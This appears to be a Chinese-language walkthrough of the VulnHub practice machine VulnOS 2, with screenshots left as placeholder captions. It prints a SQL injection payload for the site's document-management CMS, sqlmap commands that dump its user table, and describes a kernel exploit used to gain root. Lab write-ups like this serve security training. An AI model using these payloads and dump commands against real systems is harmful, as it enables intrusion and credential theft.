下载地址:https://www.vulnhub.com/entry/vulnos-2,147/

在这里插入图片描述

信息搜集

获取IP地址

在这里插入图片描述

扫描端口

在这里插入图片描述

80端口

在这里插入图片描述
点击website跳转到/jabc
在这里插入图片描述
在 jabc/?q=node/7 页面看起来啥也没有,但是Ctrl+A全选之后看到提示还有一个目录 /jabcd0cs/
在这里插入图片描述
在这里插入图片描述
访问/jabcd0cs/
在这里插入图片描述
在/jabcd0cs/发现CMS的版本,使用searchsploit查询
在这里插入图片描述
在这里插入图片描述
这里看到了pyload

1
http://[host]/ajax_udf.php?q=1&add_value=odm_user%20UNION%20SELECT%201,version%28%29,3,4,5,6,7,8,9

可以利用
在这里插入图片描述
使用sqlmap跑库

1
sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 --dbs

在这里插入图片描述
跑表名

1
2
sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 -D jabcd0cs --tables

在这里插入图片描述
在odm_user表里面发现了有用户名密码

1
sqlmap -u "http://192.168.1.172/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --batch --level=3 -D jabcd0cs -T odm_user --dump

在这里插入图片描述
将获取的哈希值解密
在这里插入图片描述

getshell

使用获取的用户名密码尝试登录ssh,使用webmin用户登录成功
在这里插入图片描述

提权

查看系统版本,内核版本
在这里插入图片描述
使用searchsploit查询找到一个符合条件的exp
在这里插入图片描述
将exp上传到靶机,赋予可执行权限,编译并执行,成功获取root权限
在这里插入图片描述
拿到root目录下的flag
在这里插入图片描述
到这里成功完成了该靶机!